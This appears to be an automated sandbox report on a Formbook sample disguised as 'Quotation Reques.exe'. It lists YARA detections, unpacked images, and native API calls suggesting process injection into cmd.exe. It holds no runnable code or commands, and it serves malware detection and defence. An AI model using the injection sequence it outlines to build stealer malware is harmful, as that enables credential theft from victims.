Source: Yara match File source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: Quotation Reques.exe, LogIn.cs Long String: Length: 13656
Source: ftkqUsB.exe.0.dr, LogIn.cs Long String: Length: 13656
Source: 0.2.Quotation Reques.exe.90000.0.unpack, LogIn.cs Long String: Length: 13656
Source: 0.0.Quotation Reques.exe.90000.0.unpack, LogIn.cs Long String: Length: 13656
Source: 6.2.Quotation Reques.exe.660000.1.unpack, LogIn.cs Long String: Length: 13656
Source: 6.0.Quotation Reques.exe.660000.0.unpack, LogIn.cs Long String: Length: 13656
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Quotation Reques.exe
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_004181D0 NtCreateFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00418280 NtReadFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00418300 NtClose
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_004183B0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_004181CA NtCreateFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041827A NtReadFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00418222 NtCreateFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_004182FA NtClose
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_004183AC NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041842A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B99A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B95D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B98F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B97A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B96E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011BAD30 NtSetContextThread
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9950 NtQueueApcThread
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9560 NtWriteFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9820 NtEnumerateKey
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011BB040 NtSuspendThread
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011BA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9B00 NtSetValueKey
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9770 NtSetInformationFile
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011BA770 NtOpenThread
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9760 NtOpenProcess
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011BA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9A10 NtQuerySection
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9650 NtQueryValueKey
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011B96D0 NtCreateKey
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038B42E NtOpenThreadToken, NtOpenProcessToken, NtClose
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003884BE NtQueryVolumeInformationFile, GetFileInformationByHandleEx
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003858A4 _setjmp3, NtQueryInformationProcess, NtSetInformationProcess, NtSetInformationProcess, longjmp
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038B4F8 NtQueryInformationToken, NtQueryInformationToken
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038B4C0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003A6D90 EnterCriticalSection, LeaveCriticalSection, fprintf, fflush, TryAcquireSRWLockExclusive, NtCancelSynchronousIoFile, ReleaseSRWLockExclusive, _get_osfhandle, FlushConsoleInputBuffer
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003AB5E0 SetLastError, CreateDirectoryW, CreateFileW, RtlDosPathNameToNtPathName_U, memset, memcpy, memcpy, NtFsControlFile, RtlNtStatusToDosError, SetLastError, CloseHandle, RtlFreeHeap, RemoveDirectoryW
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003A9AB4 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003883F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus, NtOpenFile, RtlReleaseRelativeName, RtlFreeUnicodeString, CloseHandle, DeleteFileW, GetLastError
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF99A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF96E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF96D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF95D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9A20 NtResumeThread
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9A10 NtQuerySection
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FFA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FFB040 NtSuspendThread
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9660 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9650 NtQueryValueKey
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FFA770 NtOpenThread
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9760 NtOpenProcess
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FFA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9560 NtWriteFile
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FFAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00396550: memset, GetFileSecurityW, GetSecurityDescriptorOwner, ??_V@YAXPAX@Z, memset, CreateFileW, DeviceIoControl, memcpy, CloseHandle, ??_V@YAXPAX@Z, memset, ??_V@YAXPAX@Z, FindClose, ??_V@YAXPAX@Z
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0039374E InitializeProcThreadAttributeList, UpdateProcThreadAttribute, memset, memset, GetStartupInfoW, lstrcmpW, CreateProcessW, CloseHandle, GetLastError, GetLastError, DeleteProcThreadAttributeList, _local_unwind4, CreateProcessAsUserW, GetLastError, CloseHandle
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_00A1C2B0
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_00A19990
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_06B30040
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_06B32EB8
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_06B32EA7
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_06B32C68
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_06B32C58
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_06B30D88
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 0_2_06B3FA20
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041B862
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041C864
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00401030
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_004012FB
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041BB26
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00408C6B
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00408C70
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041CC1E
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00402D90
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041CE55
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0041CFEB
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_00402FB0
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0117F900
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01242D07
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01170D20
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01194120
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01241D55
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011A2581
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0118D5E0
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_012425DD
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0118841F
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01231002
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0123D466
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0118B090
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_012420A8
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011A20A0
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_012428EC
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01242B28
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_011AEBB0
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01241FF1
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_0123DBD2
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01196E30
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_012422AE
Source: C:\Users\user\Desktop\Quotation Reques.exe Code function: 6_2_01242EF7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038D803
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038E040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00389CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003A5CEA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003848E6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003A3506
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00391969
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00396550
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00387190
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003A31DC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038FA30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00385226
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00385E70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00388AD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038CB48
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003A6FF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00395FC8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03082B28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307DBD2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030703DA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEEBB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030822AE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE20A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FCB090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03071002
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0308E824
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030820A8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FD4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030828EC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBF900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0308DFCE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FD6E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03081FF1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307D616
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03082EF7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03082D07
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03081D55
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030825DD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC841F